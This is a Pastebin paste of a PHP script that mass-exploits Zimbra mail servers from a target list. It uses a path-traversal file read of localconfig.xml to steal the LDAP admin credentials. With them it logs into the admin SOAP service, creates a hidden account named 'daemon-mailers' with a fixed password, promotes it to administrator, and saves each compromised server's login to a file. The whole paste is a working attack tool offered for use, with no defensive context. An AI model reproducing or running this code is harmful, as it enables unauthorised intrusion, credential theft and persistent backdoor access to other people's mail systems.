CaFc_Br40ck

Zimbra

Aug 11th, 2017
305
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3.  
  4. error_reporting(0);
  5. function save($kontol){
  6.     $fp = @fopen("result.txt", "a") or die("cant open file");
  7.     fwrite($fp, $kontol);
  8.     fclose($fp);
  9.     }
  10.  
  11. function ambilKata($param, $kata1, $kata2){
  12.     if(strpos($param, $kata1) === FALSE) return FALSE;
  13.     if(strpos($param, $kata2) === FALSE) return FALSE;
  14.     $start = strpos($param, $kata1) + strlen($kata1);
  15.     $end = strpos($param, $kata2, $start);
  16.     $return = substr($param, $start, $end - $start);
  17.     return $return;
  18. }
  19.  
  20. function ngecek($url,$post){
  21.                     $ch = curl_init ("$url");
  22. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  23. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  24. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  25. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  26. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  27. curl_setopt ($ch, CURLOPT_POST, 1);
  28. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  29. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  30. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  31. curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
  32. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,30);
  33. $data2 = curl_exec ($ch);
  34. return $data2;
  35. }
  36.  
  37. function nganu_body($toket,$req){
  38. $body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
  39. return $body;
  40. }
  41. if(!$argv[1]){
  42.      die("usage $argv[0] list.txt ");
  43.    }
  44.  
  45.    $getlist=@file_get_contents($argv[1]);
  46.    $ex=explode("\r\n",$getlist);
  47.    echo "Total : ".count($ex)."\n";
  48.       foreach($ex as $izo){
  49. $array = array();
  50. $int = array('https://www.','http://',':','www.','https');
  51. $replace = str_replace($int, "", $izo);
  52. $maw = substr($replace,0);
  53. $target = $maw;
  54. $user_baru = "daemon-mailers";
  55. $pwd_baru = "CaFc_Br40ck";
  56. $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
  57. $link_lfi = "$target/$lfi";
  58. echo "\r\n$target\r\n";
  59.  
  60. $ch2 = curl_init ("$link_lfi");
  61.                    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  62.                    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  63.                    curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  64.                    curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  65.                    curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  66.                    curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
  67.                    curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
  68.                    curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
  69.                    curl_setopt ($ch2, CURLOPT_TIMEOUT, 30);
  70.                    curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT,30);
  71.                     $ambil = curl_exec ($ch2);
  72.  
  73.                     $get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
  74.                     preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);
  75.                    
  76.                     $get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
  77.                     preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
  78.                    if($user[1] or $pwd[1] != ""){
  79.                    echo "\r\n[+] MBOIS CUK [+]\r\n";
  80.  
  81.                     $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
  82.                    <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user[1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
  83.  
  84.                     $link = "https://$target:7071/service/admin/soap";
  85.                     $token = ngecek($link,$body);
  86.                    
  87.                 preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);
  88.                    
  89.                     if($toket[1]==""){
  90.                         echo "\r\n[-] ORAISO NJUPUK TOKET [-]\r\n";
  91.  
  92.                     }
  93.                     else{
  94.  
  95.                      
  96.                     $req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>");
  97.                     $body2 = nganu_body($toket[1],$req);
  98.  
  99.                     $liat = ngecek($link,$body2);
  100.                     preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
  101.                     echo "\r\n[+] NGGAWE AKUN [+]\r\n";
  102.                     $req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain[1]</name><password>$pwd_baru</password></CreateAccountRequest>";
  103.                     $body3 = nganu_body($toket[1],$req2);
  104.  
  105.                     $liat2 = ngecek($link,$body3);
  106.                
  107.                     preg_match('/account id="(.*)" name="/', $liat2, $new);
  108.                     $req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
  109.                     $body4 = nganu_body($toket[1],$req3);
  110.  
  111.                     $liat3 = ngecek($link,$body4);
  112.                
  113.                    
  114.                     echo "\r\n[+] \ ^_^ / [+]\r\n";
  115.                     echo "\r\n[+] Login Url: [+]\r\n $target\r\n Account: $user_baru@$domain[1]\r\n Password: $pwd_baru\r\n";
  116.                     save("Login Url: [+]\r\n http://$target\r\n Account: $user_baru@$domain[1]\r\n Password: $pwd_baru\r\n");
  117.                
  118.                    }
  119.                }
  120.                    else{
  121.                     echo "\r\n[-] Cari Yang Lain [-]\r\n";
  122.                    }
  123. }
  124. ?>
RAW Paste Data